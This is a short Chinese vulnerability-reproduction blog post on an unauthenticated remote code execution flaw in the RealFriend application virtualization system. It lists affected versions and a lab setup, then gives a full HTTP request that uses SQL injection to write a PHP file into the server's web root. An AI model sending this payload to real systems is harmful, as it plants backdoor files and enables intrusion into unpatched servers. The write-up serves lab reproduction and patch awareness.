Babing
Published on 2024-08-30 / 3 Visits
0
0

R1-5瑞友天翼-应用虚拟化系统-RCE

R1-5瑞友天翼-应用虚拟化系统-RCE

漏洞描述:

瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)

影响版本:

5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
不受影响版本
瑞友天翼应用虚拟化系统 >= 7.0.3.1

漏洞搭建:

Windows10搭建6.0.5.1漏洞版本
安装包: https://pan.baidu.com/s/17Y2nZFnvwXbxA1ACt06sLw 提取码: kymc
一直默认下一步,安装好重启电脑即可
image-20240619152242382
通过/RapAgent.xgi?CMD=GetRegInfo查看漏洞环境版本
image-20240619152248368

漏洞复现

payload:

GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: 192.168.189.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1

image-20240619152308958
image-20240619152315202


Comment